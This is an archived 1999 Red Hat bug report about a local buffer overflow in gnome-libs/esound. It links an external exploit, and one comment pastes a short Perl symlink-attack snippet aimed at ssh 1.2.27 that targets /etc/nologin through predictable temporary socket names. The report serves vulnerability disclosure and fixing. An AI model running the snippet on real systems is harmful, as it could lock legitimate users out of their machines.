Bug 5406

Summary: Gnome espeaker local buffer overflow vulnerability
Product: [Retired] Red Hat Linux Reporter: zurk
Component: gnome-libsAssignee: Elliot Lee <sopwith>
Severity: medium Docs Contact:
Priority: high    
Version: 6.0Keywords: Security
Target Milestone: ---   
Target Release: ---   
Hardware: All   
OS: Linux   
URL: http://www.securityfocus.com/data/vulnerabilities/exploits/gnox.sh
Fixed In Version: Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of: Environment:
Last Closed: 1999-10-27 20:52:14 UTC Type: ---
Regression: --- Mount Type: ---
Documentation: --- CRM:
Verified Versions: Category: ---
oVirt Team: --- RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: --- Target Upstream Version:

Description zurk 1999-09-27 20:24:21 UTC
Gnome libs 1.08 is affected by a boundary condition error.
For further details see exploit URL:
I've also seen a local exploit for ssh 1.2.27 floating
around, but since that isnt included with redhat 6
officially..i dont know where to post it.

Comment 1 Bill Nottingham 1999-09-28 14:53:59 UTC
FWIW, there are no setuid/setgid root programs that ship with GNOME.

------- Additional Comments From   10/04/99 20:06 -------
hmm...here's the exploit for ssh :

 $pid = $$;

 $whoami = `whoami`;
 mkdir("/tmp/ssh-$whoami", 0700);

 for ($i = $pid; $i < $pid+50; $i++)
 symlink("/etc/nologin", "/tmp/ssh-$whoami/ssh-$i-agent");

and a relevant link :

Comment 2 Bill Nottingham 1999-10-07 18:03:59 UTC
Huh? What does ssh have to do with gnome-libs?

------- Additional Comments From   10/10/99 17:54 -------
sorry...just found the ssh thing that was floating around and didnt
know where to post it..anyway, can we now fix both bugs ? or should i
resubmit it somewhere else ?

Comment 3 Elliot Lee 1999-10-27 20:52:59 UTC
This bug is fixed in esound cvs, will be in next release.